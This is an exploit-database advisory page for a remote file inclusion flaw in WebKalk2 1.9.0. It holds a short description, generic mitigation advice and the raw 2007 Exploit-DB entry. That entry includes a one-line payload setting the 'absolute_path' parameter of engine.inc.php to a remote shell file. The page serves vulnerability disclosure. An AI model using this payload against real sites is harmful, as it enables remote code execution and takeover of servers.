header-logo
Suggest Exploit
vendor:
WebKalk2
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: WebKalk2
Affected Version From: WebKalk2 version 1.9.0
Affected Version To: WebKalk2 version 1.9.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

WebKalk2 1.9.0 Remote File Include Vulnerability

The WebKalk2 version 1.9.0 is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by manipulating the 'absolute_path' parameter in the 'engine.inc.php' file, allowing them to include arbitrary files from a remote server.

Mitigation:

The vendor has not provided a patch for this vulnerability. To mitigate the risk, it is recommended to upgrade to a newer version of WebKalk2 or implement a web application firewall to filter out malicious requests.
Source

Exploit-DB raw data:

# WebKalk2 1.9.0 Remote File Include Vulnerablity
# D.Script: http://www.linuxdelta.de/uploads/media/webkalk2-1.9.0.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/engine/engine.inc.php?absolute_path=Shell.txt?
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# ThanX  To: G0T-ROOT.Net & bd0rk ;)

# milw0rm.com [2007-04-12]

Navigation

Suggest Exploit

Services By CQR